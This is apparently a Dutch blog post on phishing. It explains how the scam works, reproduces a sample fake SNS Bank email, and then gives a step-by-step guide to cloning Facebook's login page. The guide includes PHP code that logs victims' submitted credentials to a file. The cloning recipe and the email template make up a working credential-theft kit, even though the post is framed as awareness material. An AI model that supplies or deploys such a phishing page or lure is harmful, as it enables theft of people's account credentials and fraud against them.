Phishing – het onderscheppen van digitale persoonsgegevens.

Steeds vaker slagen criminelen er in om digitale persoonsgegevens te onderscheppen en te misbruiken. Bijna alle informatiesystemen welke zijn verbonden met het internet hebben diverse kwetsbaarheden die misbruikt kunnen worden. En betreft het niet een informatiesysteem dan is het wel de mensheid zelf die voor problemen zorgt.

Herkent u het onderstaande filmpje nog waarin een stel vissers wordt neergezet als criminelen, die met behulp van hun vishengels gegevens van willekeurige consumenten probeert te vissen uit hun huizen ?

Het reclame filmpje moet consumenten attenderen op de gevaren en risico’s van phishing. Echter wordt er geen aandacht besteedt aan hoe phishing nou daadwerkelijk werkt en hoe je dit kunt voorkomen, of waar je extra op moet letten.

Wat is Phishing?

Phishing is het onderscheppen van persoonsgegevens door internetcriminelen, specifiek digitale gegevens, waarbij diverse methodes worden gehanteerd.

Het komt met regelmaat voor dat er mails worden verzonden, zogenaamd als afzender van een Nederlandse bank. Deze mails worden specifiek naar personen verstuurt die ook daadwerkelijk een bankrekening of online bankieren hebben van de betreffende bank. Deze informatie weten internetcriminelen op diverse manieren te achterhalen. Hierin wordt gevraagd om bijvoorbeeld in te loggen in de online bankieren omgeving, om zo een nieuwe instelling te verifiëren. Hiervoor moet er wel eerst worden ingelogd. Wat de onwetende internetgebruiker niet weet of ziet, is dat er niet naar de officiële website wordt gelinkt, maar naar een nep webpagina wordt gebracht. Vervolgens wordt er ingelogd zoals dat normaliter ook gaat, echter worden de ingevoerde gegevens doorgestuurd naar een e-mailadres, tekst bestand, PHP of HTML pagina. Deze gegevens worden dus opgeslagen in een database waar internetcriminelen toegang tot hebben en later deze persoonsgegevens kunnen misbruiken, met alle gevolgen van dien.

Een phishing mail kan er als volgt uitzien:

Beste Klant,

Zoals u reeds heeft vernomen hebben wij als SNS Bank enige tijd geleden te maken gehad met een fusie van de huidige SNS Bank met het voormalige Postbank.
Voor de klant is er overigens weinig veranderd, echter achter de schermen hebben wij een totaal nieuwe internetapplicatie geprogrammeerd die aan de hedendaagse veiligheidseisen voldoet conform de Europese richtlijnen betreft het betalingsverkeer.
Bij een verbetering (update) van ons online veiligheidssysteem hebben wij bij uw rekening een foutmelding ontvangen met als code ASV-317. Deze foutmelding is simpel te verwerken door de upgradepagina te downloaden die u kunt vinden als bijlage in deze mail.
Vul het formulier in en log in op uw account. Zodra u heeft ingelogd kunnen wij het proces afronden en krijgt u binnen 7 werkdagen een geautomatiseerde bevestigingsmail toegestuurd.

© 2011 SNS Bank

Facebook Phishing website
In het volgende voorbeeld zal een stappenplan worden gegeven m.b.t. het maken van een phishing pagina. Het is niet moeilijk om iets dergelijks op te zetten. Grote uitdaging in dit geval is het spoofen van de URL. In jip-en-janneketaal: de URL dient aangepast te worden zodat de gebruiker daadwerkelijk ‘http://www.facebook.nl’ of ‘http://www.facebook.nl’ krijgt te zien zodat men geen argwaan krijgt en direct zijn persoonsgegevens invult.

1.

Ga naar www.facebook.nl klik op bestand en vervolgens “opslaan als”.
Geef als bestandsnaam index.html op en sla de site op als webpagina, volledig (*.htm;*.html).
Kies een lokale locatie om de website inclusief afbeeldingen en scripts op te slaan.

2. Open het bestand index.html met Notepad of Notepad++ en zoek naar de regel method=”POST” action=”http://www.facebook.com/login.php?login_attempt=1″

Verander dit naar “method=”GET” action=”hello.php”
Sla het html bestand op.

3.

Open een nieuw tekst bestand en plak de volgende code in het bestand:


<?
$handle = fopen(“lol.html”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>

Sla dit document vervolgens op als hello.php.
Zorg ervoor dat de extensie .txt weggehaald wordt.

4.

Open weer een leeg tekst document, er dienen geen gegevens of tekst ingevoerd te worden. Hierna
wordt het document opgeslagen als lol.html.

5.

Upload alle bestanden naar een directory op je webhost. Als je nu de index.html aanroept krijgt je de inlogpagina van Facebook te zien.
Als er vervolgens wordt ingelogd, krijgt de gebruiker een foutmelding te zien. De persoonsgegevens worden nu opgeslagen in het bestand lol.html.

6.

Nu komt het moeilijkste, namelijk URL-spoofing. Een instructie hiervoor zal ik niet maken. Dit dien je zelf uit te zoeken aangezien dit ontzettend technisch is en niet 123 uitgevoerd kan worden.

Geef als eerste een reactie

Geef een reactie

Uw e-mailadres wordt niet gepubliceerd.


*